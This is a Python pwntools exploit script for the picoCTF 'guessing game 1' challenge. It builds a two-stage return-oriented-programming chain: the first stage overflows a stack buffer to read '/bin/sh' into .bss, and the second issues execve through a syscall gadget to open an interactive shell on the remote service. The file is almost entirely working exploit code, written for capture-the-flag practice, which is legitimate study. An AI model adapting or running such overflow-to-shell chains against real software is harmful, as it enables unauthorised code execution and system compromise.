#!/usr/bin/env python
"""Two-stage ROP exploit for the picoCTF "guessing game 1" binary.

Stage 1 overflows the name buffer to call read(0, .bss, 12) and return to
main, staging the string "/bin/sh" in writable memory.  Stage 2 overflows
the same buffer again and issues execve(.bss, NULL, NULL) through a raw
syscall gadget.

Reference write-up:
https://cyb3rwhitesnake.medium.com/picoctf-guessing-game-1-pwn-bdc1c87016f9
"""
from pwn import *

context.terminal = "kitty"

# Answers to the "guess?" prompts, in the order the service asks for them.
# Only the first two are consumed here; the list came from a separate
# brute-forcing script and depends on the target's RNG sequence, so
# re-derive it if the service is rebuilt.
numbers = [84, 87, 78, 16, 94, 36]

TARGET_HOST = "shape-facility.picoctf.net"
TARGET_PORT = 50780

# Bytes of filler between the start of the name buffer and the saved return
# address on the stack.
ret_offset = 120

# Gadgets and symbols resolved from the target binary.
elf = ELF("./vuln")
rop = ROP(elf)
gadget = {
    "rdi": rop.rdi.address,
    "rsi": rop.rsi.address,
    "rdx": rop.rdx.address,
    "rax": rop.rax.address,
    "syscall": rop.syscall.address,
}
bss = elf.bss()
read = elf.functions['read'].address
main = elf.functions['main'].address


def _chain(*words):
    """Pack a sequence of 64-bit stack words into one ROP payload."""
    return b"".join(p64(w) for w in words)


def _overflow(chain):
    """Prefix a ROP chain with enough filler to reach the return address."""
    return cyclic(ret_offset, n=8) + chain


def _pass_guess(io, value):
    """Answer one "guess?" prompt, then wait for the "Name?" prompt behind it."""
    io.recvuntil(b"guess?")
    io.sendline(str(value).encode())
    io.recvuntil(b"Name?")


conn = remote(TARGET_HOST, TARGET_PORT)
# For local debugging swap the line above for:
#   conn = process("./vuln"); attach(conn)

# --- stage 1: read(0, bss, 12), then return to main ----------------------
# SysV x86-64 argument registers: rdi = fd, rsi = buf, rdx = count.
_pass_guess(conn, numbers[0])
log.info("sending read payload")
stage1 = _chain(
    gadget["rdi"], 0,
    gadget["rsi"], bss,
    gadget["rdx"], 12,
    read,
    main,
)
conn.sendline(_overflow(stage1))
# Data for the staged read(): sendline appends "\n", so 9 bytes arrive,
# inside the 12-byte budget, and the explicit NUL keeps the path terminated
# for execve regardless of what follows it in .bss.
conn.sendline(b"/bin/sh\x00")

# --- stage 2: execve(bss, NULL, NULL) via a raw syscall ------------------
# rax = 59 (sys_execve), rdi = filename, rsi = argv, rdx = envp.
_pass_guess(conn, numbers[1])
log.info("calling execve")
stage2 = _chain(
    gadget["rax"], 59,
    gadget["rdi"], bss,
    gadget["rsi"], 0,
    gadget["rdx"], 0,
    gadget["syscall"],
)
conn.sendline(_overflow(stage2))

conn.recvline()
conn.interactive()